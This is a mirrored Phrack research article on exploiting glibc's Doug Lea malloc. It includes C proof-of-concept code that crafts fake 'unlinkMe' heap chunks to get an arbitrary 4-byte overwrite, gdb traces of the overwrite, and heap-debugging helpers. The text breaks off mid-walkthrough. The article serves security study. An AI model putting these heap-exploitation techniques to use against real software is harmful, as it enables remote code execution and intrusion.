mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
2467 lines
91 KiB
Text
2467 lines
91 KiB
Text
==Phrack Inc.==
|
|
|
|
Volume 0x0b, Issue 0x3d, Phile #0x06 of 0x0f
|
|
|
|
|=--------------[ Advanced Doug lea's malloc exploits ]-----------------=|
|
|
|=----------------------------------------------------------------------=|
|
|
|=-----------------------[ jp <jp@corest.com> ]-------------------------=|
|
|
|=----------------------------------------------------------------------=|
|
|
|
|
1 - Abstract
|
|
2 - Introduction
|
|
3 - Automating exploitation problems
|
|
4 - The techniques
|
|
4.1 - aa4bmo primitive
|
|
4.1.1 - First unlinkMe chunk
|
|
4.1.1.1 - Proof of concept 1: unlinkMe chunk
|
|
4.1.2 - New unlinkMe chunk
|
|
4.2 - Heap layout analysis
|
|
4.2.1 - Proof of concept 2: Heap layout debugging
|
|
4.3 - Layout reset - initial layout prediction - server model
|
|
4.4 - Obtaining information from the remote process
|
|
4.4.1 - Modifying server static data - finding process' DATA
|
|
4.4.2 - Modifying user input - finding shellcode location
|
|
4.4.2.1 - Proof of concept 3 : Hitting the output
|
|
4.4.3 - Modifying user input - finding libc's data
|
|
4.4.3.1 - Proof of concept 4 : Freeing the output
|
|
4.4.4 - Vulnerability based heap memory leak - finding libc's DATA
|
|
4.5 - Abusing the leaked information
|
|
4.5.1 - Recognizing the arena
|
|
4.5.2 - Morecore
|
|
4.5.2.1 - Proof of concept 5 : Jumping with morecore
|
|
4.5.3 - Libc's GOT bruteforcing
|
|
4.5.3.1 - Proof of concept 6 : Hinted libc's GOT bruteforcing
|
|
4.5.4 - Libc fingerprinting
|
|
4.5.5 - Arena corruption (top, last remainder and bin modification)
|
|
4.6 - Copying the shellcode 'by hand'
|
|
5 - Conclusions
|
|
6 - Thanks
|
|
7 - References
|
|
|
|
Appendix I - malloc internal structures overview
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
--[ 1. Abstract
|
|
|
|
This paper details several techniques that allow more generic and reliable
|
|
exploitation of processes that provide us with the ability to overwrite
|
|
an almost arbitrary 4 byte value at any location.
|
|
Higher level techniques will be constructed on top of the unlink() basic
|
|
technique (presented in MaXX's article [2]) to exploit processes which
|
|
allow an attacker to corrupt Doug Lea's malloc (Linux default's dynamic
|
|
memory allocator).
|
|
unlink() is used to force specific information leaks of the target process
|
|
memory layout. The obtained information is used to exploit the target
|
|
without any prior knowledge or hardcoded values, even when randomization
|
|
of main object's and/or libraries' load address is present.
|
|
|
|
Several tricks will be presented along different scenarios, including:
|
|
* special chunks crafting (cushion chunk and unlinkMe chunk)
|
|
* heap layout consciousness and analysis using debugging tools
|
|
* automatically finding the injected shellcode in the process memory
|
|
* forcing a remote process to provide malloc's internal structures
|
|
addresses
|
|
* looking for a function pointer within glibc
|
|
* injecting the shellcode into a known memory address
|
|
|
|
The combination of these techniques allows to exploit the OpenSSL 'SSLv2
|
|
Malformed Client Key Buffer Overflow' [6] and the CVS 'Directory double
|
|
free' [7] vulnerabilities in a fully automated way (without hardcoding
|
|
any target based address or offset), for example.
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
--[ 2. Introduction
|
|
|
|
Given a vulnerability which allows us to corrupt malloc's internal
|
|
structures (i.e. heap overflow, double free(), etc), we can say it
|
|
'provides' us with the ability to perform at least an 'almost arbitrary 4
|
|
bytes mirrored overwrite' primitive (aa4bmo from now on).
|
|
We say it's a 'mirrored' overwrite as the location we are writing at
|
|
minus 8 will be stored in the address given by the value we are writing
|
|
plus 12. Note we say almost arbitrary as we can only write values that are
|
|
writable, as a side effect of the mirrored copy.
|
|
The 'primitive' concept was previously introduced in the 'Advances in
|
|
format string exploitation' paper [4] and in the 'About exploits writing'
|
|
presentation [5].
|
|
Previous work 'Vudo - An object superstitiously believed to embody magical
|
|
power' by Michel 'MaXX' Kaempf [2] and 'Once upon a free()' [3] give fully
|
|
detailed explanations on how to obtain the aa4bmo primitive from a
|
|
vulnerability. At [8] and [9] can be found the first examples of malloc
|
|
based exploitation.
|
|
We'll be using the unlink() technique from [2] as the basic lower level
|
|
mechanism to obtain the aa4bmo primitive, which we'll use through all the
|
|
paper to build higher level techniques.
|
|
|
|
malloc higher
|
|
vulnerability -> structures -> primitive -> level
|
|
corruption techniques
|
|
---------------------------------------------------------------------------
|
|
heap overflow unlink() freeing the output
|
|
double free() -> technique -> aa4bmo -> hitting the output
|
|
... cushion chunk
|
|
...
|
|
|
|
This paper focuses mainly on the question that arises after we reach the
|
|
aa4bmo primitive: what should we do once we know a process allows us to
|
|
overwrite four bytes of its memory with almost any arbitrary data?
|
|
In addition, tips to reach the aa4bmo primitive in a reliable way are
|
|
explained.
|
|
|
|
Although the techniques are presented in the context of malloc based
|
|
heap overflow exploitation, they can be employed to aid in format string
|
|
exploits as well, for example, or any other vulnerability or combination
|
|
of them, which provide us with similar capabilities.
|
|
|
|
The research was focused on the Linux/Intel platform; glibc-2.2.4,
|
|
glibc-2.2.5 and glibc-2.3 sources were used, mainly the file malloc.c
|
|
(an updated version of malloc can be found at [1]). Along this paper we'll
|
|
use 'malloc' to refer to Doug Lea's malloc based implementation.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 3. Automating exploitation problems
|
|
|
|
When trying to answer the question 'what should we do once we know we can
|
|
overwrite four bytes of the process memory with almost any arbitrary
|
|
data?', we face several problems:
|
|
|
|
A] how can we be sure we are overwriting the desired bytes with the
|
|
desired bytes?
|
|
As the aa4bmo primitive is the underlying layer that allows us to
|
|
implement the higher level techniques, we need to be completely sure it is
|
|
working as expected, even when we know we won't know where our data will
|
|
be located. Also, in order to be useful, the primitive should not crash
|
|
the exploited process.
|
|
|
|
B] what should we write?
|
|
We may write the address of the code we intend to execute, or we may
|
|
modify a process variable. In case we inject our shellcode in the
|
|
process, we need to know its location, which may vary together with the
|
|
evolving process heap/stack layout.
|
|
|
|
C] where should we write?
|
|
Several known locations can be overwritten to modify the execution flow,
|
|
including for example the ones shown in [10], [11], [12] and [14].
|
|
In case we are overwriting a function pointer (as when overwriting a stack
|
|
frame, GOT entry, process specific function pointer, setjmp/longjmp,
|
|
file descriptor function pointer, etc), we need to know its precise location.
|
|
The same happens if we plan to overwrite a process variable. For example,
|
|
a GOT entry address may be different even when the source code is the
|
|
same, as compilation and linking parameters may yield a different process
|
|
layout, as happens with the same program source code compiled for
|
|
different Linux distributions.
|
|
|
|
Along this paper, our examples will be oriented at overwriting a function
|
|
pointer with the address of injected shellcode. However, some techniques
|
|
also apply to other cases.
|
|
|
|
Typical exploits are target based, hardcoding at least one of the values
|
|
required for exploitation, such as the address of a given GOT entry,
|
|
depending on the targeted daemon version and the Linux distribution and
|
|
release version. Although this simplifies the exploitation process, it is
|
|
not always feasible to obtain the required information (i.e. a server can
|
|
be configured to lie or to not disclose its version number). Besides, we
|
|
may not have the needed information for the target. Bruteforcing more than
|
|
one exploit parameter may not always be possible, if each of the values
|
|
can't be obtained separately.
|
|
There are some well known techniques used to improve the reliability
|
|
(probability of success) of a given exploit, but they are only an aid for
|
|
improving the exploitation chances. For example, we may pad the shellcode
|
|
with more nops, we may also inject a larger quantity of shellcode in the
|
|
process (depending on the process being exploited) inferring there are
|
|
more possibilities of hitting it that way. Although these enhancements
|
|
will improve the reliability of our exploit, they are not enough for an
|
|
exploit to work always on any vulnerable target. In order to create a
|
|
fully reliable exploit, we'll need to obtain both the address where our
|
|
shellcode gets injected and the address of any function pointer to
|
|
overwrite.
|
|
|
|
In the following, we discuss how these requirements may be accomplished in
|
|
an automated way, without any prior knowledge of the target server. Most
|
|
of the article details how we can force a remote process to leak the
|
|
required information using aa4bmo primitive.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 4. The techniques
|
|
|
|
--] 4.1 aa4bmo primitive
|
|
|
|
--] 4.1.1 First unlinkMe chunk
|
|
|
|
In order to be sure that our primitive is working as expected, even in
|
|
scenarios where we are not able to fully predict the location of our
|
|
injected fake chunk, we build the following 'unlinkMe chunk':
|
|
|
|
|
|
-4 -4 what where-8 -11 -15 -19 ...
|
|
|--------|--------|--------|--------|--------|--------|--------|...
|
|
sizeB sizeA FD BK
|
|
----------- nasty chunk -----------|--------|-------------------->
|
|
(X)
|
|
|
|
We just need a free() call to hit our block after the (X) point to
|
|
overwrite 'where' with 'what'.
|
|
|
|
When free() is called the following sequence takes place:
|
|
|
|
- chunk_free() tries to look for the next chunk, it takes the chunk's
|
|
size (<0) and adds it to the chunk address, obtaining always the sizeA
|
|
of the 'nasty chunk' as the start of the next chunk, as all the sizes
|
|
after the (X) are relative to it.
|
|
|
|
- Then, it checks the prev_inuse bit of our chunk, but as we set it (each
|
|
of the sizes after the (X) point has the prev_inuse bit set, the
|
|
IS_MMAPPED bit is not set) it does not try to backward consolidate
|
|
(because the previous chunk 'seems' to be allocated).
|
|
|
|
- Finally, it checks if the fake next chunk (our nasty chunk) is free. It
|
|
takes its size (-4) to look for the next chunk, obtaining our fake
|
|
sizeB, and checks for the prev_inuse flag, which is not set. So, it
|
|
tries to unlink our nasty chunk from its bin to coalesce it with the
|
|
chunk being freed.
|
|
|
|
- When unlink() is called, we get the aa4bmo primitive. The unlink()
|
|
technique is described in [2] and [3].
|
|
|
|
--] 4.1.1.1 Proof of concept 1: unlinkMe chunk
|
|
|
|
We'll use the following code to show in a simple way the unlinkMe chunk in
|
|
action:
|
|
|
|
#define WHAT_2_WRITE 0xbfffff00
|
|
#define WHERE_2_WRITE 0xbfffff00
|
|
#define SZ 256
|
|
#define SOMEOFFSET 5 + (rand() % (SZ-1))
|
|
#define PREV_INUSE 1
|
|
#define IS_MMAP 2
|
|
int main(void){
|
|
unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
|
|
int i = 0;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = WHAT_2_WRITE;
|
|
unlinkMe[i++] = WHERE_2_WRITE-8;
|
|
for(;i<SZ;i++){
|
|
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
|
|
}
|
|
free(unlinkMe+SOMEOFFSET);
|
|
return 0;
|
|
}
|
|
|
|
Breakpoint 3, free (mem=0x804987c) at heapy.c:3176
|
|
|
|
if (mem == 0) /* free(0) has no effect */
|
|
3181 p = mem2chunk(mem);
|
|
3185 if (chunk_is_mmapped(p)) /* release mmapped memory. */
|
|
|
|
We did not set the IS_MMAPPED bit.
|
|
|
|
3193 ar_ptr = arena_for_ptr(p);
|
|
3203 (void)mutex_lock(&ar_ptr->mutex);
|
|
3205 chunk_free(ar_ptr, p);
|
|
|
|
After some checks, we reach chunk_free().
|
|
|
|
(gdb) s
|
|
chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221
|
|
|
|
Let's see how does our chunk looks at a random location...
|
|
|
|
(gdb) x/20x p
|
|
0x8049874: 0xfffffd71 0xfffffd6d 0xfffffd69 0xfffffd65
|
|
0x8049884: 0xfffffd61 0xfffffd5d 0xfffffd59 0xfffffd55
|
|
0x8049894: 0xfffffd51 0xfffffd4d 0xfffffd49 0xfffffd45
|
|
0x80498a4: 0xfffffd41 0xfffffd3d 0xfffffd39 0xfffffd35
|
|
0x80498b4: 0xfffffd31 0xfffffd2d 0xfffffd29 0xfffffd25
|
|
|
|
We dumped the chunk including its header, as received by chunk_free().
|
|
|
|
3221 INTERNAL_SIZE_T hd = p->size; /* its head field */
|
|
3235 sz = hd & ~PREV_INUSE;
|
|
|
|
(gdb) p/x hd
|
|
$5 = 0xfffffd6d
|
|
(gdb) p/x sz
|
|
$6 = 0xfffffd6c
|
|
|
|
3236 next = chunk_at_offset(p, sz);
|
|
3237 nextsz = chunksize(next);
|
|
|
|
|
|
Using the negative relative size, chunk_free() gets the next chunk, let's
|
|
see which is the 'next' chunk:
|
|
|
|
(gdb) x/20x next
|
|
0x80495e0: 0xfffffffc 0xfffffffc 0xbfffff00 0xbffffef8
|
|
0x80495f0: 0xfffffff5 0xfffffff1 0xffffffed 0xffffffe9
|
|
0x8049600: 0xffffffe5 0xffffffe1 0xffffffdd 0xffffffd9
|
|
0x8049610: 0xffffffd5 0xffffffd1 0xffffffcd 0xffffffc9
|
|
0x8049620: 0xffffffc5 0xffffffc1 0xffffffbd 0xffffffb9
|
|
|
|
(gdb) p/x nextsz
|
|
$7 = 0xfffffffc
|
|
|
|
It's our nasty chunk...
|
|
|
|
3239 if (next == top(ar_ptr)) /* merge with top */
|
|
3278 islr = 0;
|
|
3280 if (!(hd & PREV_INUSE)) /* consolidate backward */
|
|
|
|
We avoid the backward consolidation, as we set the PREV_INUSE bit.
|
|
|
|
3294 if (!(inuse_bit_at_offset(next, nextsz)))
|
|
/* consolidate forward */
|
|
|
|
But we force a forward consolidation. The inuse_bit_at_offset() macro adds
|
|
nextsz (-4) to our nasty chunk's address, and looks for the PREV_INUSE bit
|
|
in our other -4 size.
|
|
|
|
3296 sz += nextsz;
|
|
3298 if (!islr && next->fd == last_remainder(ar_ptr))
|
|
3306 unlink(next, bck, fwd);
|
|
|
|
unlink() is called with our supplied values: 0xbffffef8 and 0xbfffff00 as
|
|
forward and backward pointers (it does not crash, as they are valid
|
|
addresses).
|
|
|
|
next = chunk_at_offset(p, sz);
|
|
3315 set_head(p, sz | PREV_INUSE);
|
|
3316 next->prev_size = sz;
|
|
3317 if (!islr) {
|
|
3318 frontlink(ar_ptr, p, sz, idx, bck, fwd);
|
|
|
|
fronlink() is called and our chunk is inserted in the proper bin.
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049a40 - top size = 0x05c0
|
|
bin 126 @ 0x40018430
|
|
free_chunk @ 0x80498d8 - size 0xfffffd64
|
|
|
|
The chunk was inserted into one of the bigger bins... as a consequence of
|
|
its 'negative' size.
|
|
The process won't crash if we are able to maintain this state. If more
|
|
calls to free() hit our chunk, it won't crash. But it will crash in case a
|
|
malloc() call does not find any free chunk to satisfy the allocation
|
|
requirement and tries to split one of the bins in the bin number 126, as
|
|
it will try to calculate where is the chunk after the fake one, getting
|
|
out of the valid address range because of the big 'negative' size (this
|
|
may not happen in a scenario where there is enough memory allocated
|
|
between the fake chunk and the top chunk, forcing this layout is not very
|
|
difficult when the target server does not impose tight limits to our
|
|
requests size).
|
|
|
|
We can check the results of the aa4bmo primitive:
|
|
|
|
(gdb) x/20x 0xbfffff00
|
|
|
|
!!!!!!!!!! !!!!!!!!!!
|
|
0xbfffff00: 0xbfffff00 0x414c0065 0x653d474e 0xbffffef8
|
|
0xbfffff10: 0x6f73692e 0x39353838 0x53003531 0x415f4853
|
|
0xbfffff20: 0x41504b53 0x2f3d5353 0x2f727375 0x6562696c
|
|
0xbfffff30: 0x2f636578 0x6e65706f 0x2f687373 0x6d6f6e67
|
|
0xbfffff40: 0x73732d65 0x73612d68 0x7361706b 0x4f480073
|
|
|
|
|
|
If we add some bogus calls to free() in the following way:
|
|
|
|
for(i=0;i<5;i++) free(unlinkMe+SOMEOFFSET);
|
|
|
|
we obtain the following result for example:
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
|
|
bin 126 @ 0x40018430
|
|
free_chunk @ 0x8049958 - size 0x8049958
|
|
free_chunk @ 0x8049954 - size 0xfffffd68
|
|
free_chunk @ 0x8049928 - size 0xfffffd94
|
|
free_chunk @ 0x8049820 - size 0x40018430
|
|
free_chunk @ 0x80499c4 - size 0xfffffcf8
|
|
free_chunk @ 0x8049818 - size 0xfffffea4
|
|
|
|
without crashing the process.
|
|
|
|
--] 4.1.2 New unlinkMe chunk
|
|
|
|
Changes introduced in newer libc versions (glibc-2.3 for example) affect
|
|
our unlinkMe chunk. The main problem for us is related to the addition of
|
|
one flag bit more. SIZE_BITS definition was modified, from:
|
|
|
|
#define SIZE_BITS (PREV_INUSE|IS_MMAPPED)
|
|
|
|
to:
|
|
|
|
#define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA)
|
|
|
|
The new flag, NON_MAIN_ARENA is defined like this:
|
|
|
|
/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
|
|
from a non-main arena. This is only set immediately before handing
|
|
the chunk to the user, if necessary. */
|
|
#define NON_MAIN_ARENA 0x4
|
|
|
|
|
|
This makes our previous unlinkMe chunk to fail in two different points in
|
|
systems using a newer libc.
|
|
|
|
Our first problem is located within the following code:
|
|
|
|
public_fREe(Void_t* mem)
|
|
{
|
|
...
|
|
ar_ptr = arena_for_chunk(p);
|
|
...
|
|
_int_free(ar_ptr, mem);
|
|
...
|
|
|
|
where:
|
|
|
|
#define arena_for_chunk(ptr) \
|
|
(chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
|
|
|
|
and
|
|
|
|
/* check for chunk from non-main arena */
|
|
#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
|
|
|
|
If heap_for_ptr() is called when processing our fake chunk, the process
|
|
crashes in the following way:
|
|
|
|
0x42074a04 in free () from /lib/i686/libc.so.6
|
|
1: x/i $eip 0x42074a04 <free+84>: and $0x4,%edx
|
|
(gdb) x/20x $edx
|
|
0xffffffdd: Cannot access memory at address 0xffffffdd
|
|
|
|
0x42074a07 in free () from /lib/i686/libc.so.6
|
|
1: x/i $eip 0x42074a07 <free+87>: je 0x42074a52 <free+162>
|
|
|
|
0x42074a09 in free () from /lib/i686/libc.so.6
|
|
1: x/i $eip 0x42074a09 <free+89>: and $0xfff00000,%eax
|
|
|
|
0x42074a0e in free () from /lib/i686/libc.so.6
|
|
1: x/i $eip 0x42074a0e <free+94>: mov (%eax),%edi
|
|
(gdb) x/x $eax
|
|
0x8000000: Cannot access memory at address 0x8000000
|
|
|
|
Program received signal SIGSEGV, Segmentation fault.
|
|
0x42074a0e in free () from /lib/i686/libc.so.6
|
|
1: x/i $eip 0x42074a0e <free+94>: mov (%eax),%edi
|
|
|
|
So, the fake chunk size has to have its NON_MAIN_ARENA flag not set.
|
|
|
|
|
|
Then, our second problem takes places when the supplied size is masked
|
|
with the SIZE_BITS. Older code looked like this:
|
|
|
|
nextsz = chunksize(next);
|
|
0x400152e2 <chunk_free+64>: mov 0x4(%edx),%ecx
|
|
0x400152e5 <chunk_free+67>: and $0xfffffffc,%ecx
|
|
|
|
and new code is:
|
|
|
|
nextsize = chunksize(nextchunk);
|
|
0x42073fe0 <_int_free+112>: mov 0x4(%ecx),%eax
|
|
0x42073fe3 <_int_free+115>: mov %ecx,0xffffffec(%ebp)
|
|
0x42073fe6 <_int_free+118>: mov %eax,0xffffffe4(%ebp)
|
|
0x42073fe9 <_int_free+121>: and $0xfffffff8,%eax
|
|
|
|
So, we can't use -4 anymore, the smaller size we can provide is -8.
|
|
Also, we are not able anymore to make every chunk to point to our nasty
|
|
chunk. The following code shows our new unlinkMe chunk which solves both
|
|
problems:
|
|
|
|
unsigned long *aa4bmoPrimitive(unsigned long what,
|
|
unsigned long where,unsigned long sz){
|
|
unsigned long *unlinkMe;
|
|
int i=0;
|
|
|
|
if(sz<13) sz = 13;
|
|
unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
|
|
// 1st nasty chunk
|
|
unlinkMe[i++] = -4; // PREV_INUSE is not set
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = what;
|
|
unlinkMe[i++] = where-8;
|
|
// 2nd nasty chunk
|
|
unlinkMe[i++] = -4; // PREV_INUSE is not set
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = what;
|
|
unlinkMe[i++] = where-8;
|
|
for(;i<sz;i++)
|
|
if(i%2)
|
|
// relative negative offset to 1st nasty chunk
|
|
unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
|
|
else
|
|
// relative negative offset to 2nd nasty chunk
|
|
unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
|
|
|
|
free(unlinkMe+SOMEOFFSET(sz));
|
|
return unlinkMe;
|
|
}
|
|
|
|
The process is similar to the previously explained for the first unlinkMe
|
|
chunk version. Now, we are using two nasty chunks, in order to be able to
|
|
point every chunk to one of them. Also, we added a -4 (PREV_INUSE flag not
|
|
set) before each of the nasty chunks, which is accessed in step 3 of the
|
|
'4.1.1 First unlinkMe chunk' section, as -8 is the smaller size we can
|
|
provide.
|
|
|
|
This new version of the unlinkMe chunk works both in older and newer libc
|
|
versions. Along the article most proof of concept code uses the first
|
|
version, replacing the aa4bmoPrimitive() function is enough to obtain an
|
|
updated version.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 4.2 Heap layout analysis
|
|
|
|
You may want to read the 'Appendix I - malloc internal structures
|
|
overview' section before going on.
|
|
Analysing the targeted process heap layout and its evolution allows to
|
|
understand what is happening in the process heap in every moment, its
|
|
state, evolution, changes... etc. This allows to predict the allocator
|
|
behavior and its reaction to each of our inputs.
|
|
Being able to predict the heap layout evolution, and using it to our
|
|
advantage is extremely important in order to obtain a reliable
|
|
exploit.
|
|
To achieve this, we'll need to understand the allocation behavior of
|
|
the process (i.e. if the process allocates large structures for each
|
|
connection, if lots of free chunks/heap holes are generated by a
|
|
specific command handler, etc), which of our inputs may be used to
|
|
force a big/small allocation, etc.
|
|
We must pay attention to every use of the malloc routines, and
|
|
how/where we might be able to influence them via our input so
|
|
that a reliable situation is reached.
|
|
For example, in a double free() vulnerability scenario, we know the
|
|
second free() call (trying to free already freed memory), will
|
|
probably crash the process. Depending on the heap layout evolution
|
|
between the first free() and the second free(), the portion of memory
|
|
being freed twice may: have not changed, have been reallocated several
|
|
times, have been coalesced with other chunks or have been overwritten and
|
|
freed.
|
|
|
|
The main factors we have to recognize include:
|
|
|
|
A] chunk size: does the process allocate big memory chunks? is our
|
|
input stored in the heap? what commands are stored in the heap?
|
|
is there any size limit to our input? am I able to force a heap
|
|
top (top_chunk) extension?
|
|
B] allocation behavior: are chunks allocated for each of our
|
|
connections? what size? are chunks allocated periodically? are
|
|
chunks freed periodically? (i.e. async garbage collector, cache
|
|
pruning, output buffers, etc)
|
|
C] heap holes: does the process leave holes? when? where? what size?
|
|
can we fill the hole with our input? can we force the overflow
|
|
condition in this hole? what is located after the hole? are we
|
|
able to force the creation of holes?
|
|
D] original heap layout: is the heap layout predictable after process
|
|
initialization? after accepting a client connection? (this is
|
|
related to the server mode)
|
|
|
|
During our tests, we use an adapted version of a real malloc
|
|
implementation taken from the glibc, which was modified to generate
|
|
debugging output for each step of the allocator's algorithms, plus three
|
|
helper functions added to dump the heap layout and state.
|
|
This allows us to understand what is going on during exploitation, the
|
|
actual state of the allocator internal structures, how our input affects
|
|
them, the heap layout, etc.
|
|
Here is the code of the functions we'll use to dump the heap state:
|
|
|
|
static void
|
|
#if __STD_C
|
|
heap_dump(arena *ar_ptr)
|
|
#else
|
|
heap_dump(ar_ptr) arena *ar_ptr;
|
|
#endif
|
|
{
|
|
mchunkptr p;
|
|
|
|
fprintf(stderr,"\n--- HEAP DUMP ---\n");
|
|
fprintf(stderr,
|
|
" ADDRESS SIZE FD BK\n");
|
|
|
|
fprintf(stderr,"sbrk_base %p\n",
|
|
(mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
|
|
~MALLOC_ALIGN_MASK));
|
|
|
|
p = (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
|
|
~MALLOC_ALIGN_MASK);
|
|
|
|
for(;;) {
|
|
fprintf(stderr, "chunk %p 0x%.4x", p, (long)p->size);
|
|
|
|
if(p == top(ar_ptr)) {
|
|
fprintf(stderr, " (T)\n");
|
|
break;
|
|
} else if(p->size == (0|PREV_INUSE)) {
|
|
fprintf(stderr, " (Z)\n");
|
|
break;
|
|
}
|
|
|
|
if(inuse(p))
|
|
fprintf(stderr," (A)");
|
|
else
|
|
fprintf(stderr," (F) | 0x%8x | 0x%8x |",p->fd,p->bk);
|
|
|
|
if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr)))
|
|
fprintf(stderr," (LR)");
|
|
else if(p->fd==p->bk & ~inuse(p))
|
|
fprintf(stderr," (LC)");
|
|
|
|
fprintf(stderr,"\n");
|
|
p = next_chunk(p);
|
|
}
|
|
fprintf(stderr,"sbrk_end %p\n",sbrk_base+sbrked_mem);
|
|
}
|
|
|
|
|
|
|
|
static void
|
|
#if __STD_C
|
|
heap_layout(arena *ar_ptr)
|
|
#else
|
|
heap_layout(ar_ptr) arena *ar_ptr;
|
|
#endif
|
|
{
|
|
mchunkptr p;
|
|
|
|
fprintf(stderr,"\n--- HEAP LAYOUT ---\n");
|
|
|
|
p = (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
|
|
~MALLOC_ALIGN_MASK);
|
|
|
|
for(;;p=next_chunk(p)) {
|
|
if(p==top(ar_ptr)) {
|
|
fprintf(stderr,"|T|\n\n");
|
|
break;
|
|
}
|
|
if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) {
|
|
fprintf(stderr,"|L|");
|
|
continue;
|
|
}
|
|
if(inuse(p)) {
|
|
fprintf(stderr,"|A|");
|
|
continue;
|
|
}
|
|
fprintf(stderr,"|%lu|",bin_index(p->size));
|
|
continue;
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
|
|
static void
|
|
#if __STD_C
|
|
bin_dump(arena *ar_ptr)
|
|
#else
|
|
bin_dump(ar_ptr) arena *ar_ptr;
|
|
#endif
|
|
{
|
|
int i;
|
|
mbinptr b;
|
|
mchunkptr p;
|
|
|
|
fprintf(stderr,"\n--- BIN DUMP ---\n");
|
|
|
|
(void)mutex_lock(&ar_ptr->mutex);
|
|
|
|
fprintf(stderr,"arena @ %p - top @ %p - top size = 0x%.4x\n",
|
|
ar_ptr,top(ar_ptr),chunksize(top(ar_ptr)));
|
|
|
|
for (i = 1; i < NAV; ++i)
|
|
{
|
|
char f = 0;
|
|
b = bin_at(ar_ptr, i);
|
|
for (p = last(b); p != b; p = p->bk)
|
|
{
|
|
if(!f){
|
|
f = 1;
|
|
fprintf(stderr," bin %d @ %p\n",i,b);
|
|
}
|
|
fprintf(stderr," free_chunk @ %p - size 0x%.4x\n",
|
|
p,chunksize(p));
|
|
}
|
|
(void)mutex_unlock(&ar_ptr->mutex);
|
|
fprintf(stderr,"\n");
|
|
}
|
|
|
|
|
|
|
|
--] 4.2.1 Proof of concept 2: Heap layout debugging
|
|
|
|
We'll use the following code to show how the debug functions help to
|
|
analyse the heap layout:
|
|
|
|
#include <malloc.h>
|
|
int main(void){
|
|
void *curly,*larry,*moe,*po,*lala,*dipsi,*tw,*piniata;
|
|
curly = malloc(256);
|
|
larry = malloc(256);
|
|
moe = malloc(256);
|
|
po = malloc(256);
|
|
lala = malloc(256);
|
|
free(larry);
|
|
free(po);
|
|
tw = malloc(128);
|
|
piniata = malloc(128);
|
|
dipsi = malloc(1500);
|
|
free(dipsi);
|
|
free(lala);
|
|
}
|
|
|
|
The sample debugging section helps to understand malloc's basic
|
|
algorithms and data structures:
|
|
|
|
(gdb) set env LD_PRELOAD ./heapy.so
|
|
|
|
We override the real malloc with our debugging functions, heapy.so also
|
|
includes the heap layout dumping functions.
|
|
|
|
(gdb) r
|
|
Starting program: /home/jp/cerebro/heapy/debugging_sample
|
|
|
|
4 curly = malloc(256);
|
|
|
|
[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
|
|
extended top chunk:
|
|
previous size 0x0
|
|
new top 0x80496a0 size 0x961
|
|
returning 0x8049598 from top chunk
|
|
|
|
(gdb) p heap_dump(0x40018040)
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0961 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
(gdb) p bin_dump(0x40018040)
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x80496a0 - top size = 0x0960
|
|
|
|
(gdb) p heap_layout(0x40018040)
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||T|
|
|
|
|
The first chunk is allocated, note the difference between the requested
|
|
size (256 bytes) and the size passed to chunk_alloc(). As there is no
|
|
chunk, the top needs to be extended and memory is requested to the
|
|
operating system. More memory than the needed is requested, the remaining
|
|
space is allocated to the 'top chunk'.
|
|
In the heap_dump()'s output the (A) represents an allocated chunk, while
|
|
the (T) means the chunk is the top one. Note the top chunk's size (0x961)
|
|
has its last bit set, indicating the previous chunk is allocated:
|
|
|
|
/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use
|
|
*/
|
|
|
|
#define PREV_INUSE 0x1UL
|
|
|
|
The bin_dump()'s output shows no bin, as there is no free chunk yet,
|
|
except from the top. The heap_layout()'s output just shows an allocated
|
|
chunk next to the top.
|
|
|
|
|
|
|
|
5 larry = malloc(256);
|
|
|
|
[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
|
|
returning 0x80496a0 from top chunk
|
|
new top 0x80497a8 size 0x859
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0109 (A)
|
|
chunk 0x80497a8 0x0859 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x80497a8 - top size = 0x0858
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||T|
|
|
|
|
